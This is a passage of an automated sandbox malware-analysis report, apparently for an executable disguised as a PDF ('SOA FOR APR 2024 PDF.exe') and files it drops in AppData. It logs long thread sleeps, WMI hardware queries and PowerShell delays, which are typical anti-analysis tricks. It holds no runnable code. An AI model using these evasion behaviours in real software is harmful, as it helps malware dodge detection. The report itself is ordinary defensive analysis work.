                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1199890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1199781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1199659s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1199525s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1199415s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1198938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1197107s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196999s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196773s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196124s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1196014s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195793s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195577s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195247s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1195140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7944Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -28592453314249787s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99216s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98669s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98124s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -98015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199329s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199204s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1199079s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198954s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198829s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198713s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198597s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198467s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198249s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198141s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1198016s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197782s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7208Thread sleep time: -1197203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7220Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep count: 39 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7060Thread sleep count: 5115 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7060Thread sleep count: 4715 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99325s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -99094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -98110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97372s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -97156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -96892s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -96766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -96625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199988s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199833s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1199047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1198015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1197906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1197797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1197687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1197578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7064Thread sleep time: -1197469s >= -30000s
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99871Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99646Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99515Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99268Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99140Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 99031Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98921Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98812Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98703Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98593Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98374Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98265Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98133Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 98015Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97906Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97796Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97687Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97578Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97468Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97359Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97249Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97135Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 97031Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 96921Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199953Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199844Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199719Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199594Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199356Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199250Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199140Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199031Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198922Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198813Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198703Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198594Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198375Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198266Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198156Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198047Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197938Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197813Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197688Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99875
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99547
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99109
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 99000
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98781
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98672
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98561
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98344
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98219
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98109
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 98000
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 97888
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 97781
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 97670
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 97561
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 97452
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 97343
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199781
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199659
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199525
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199415
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1198938
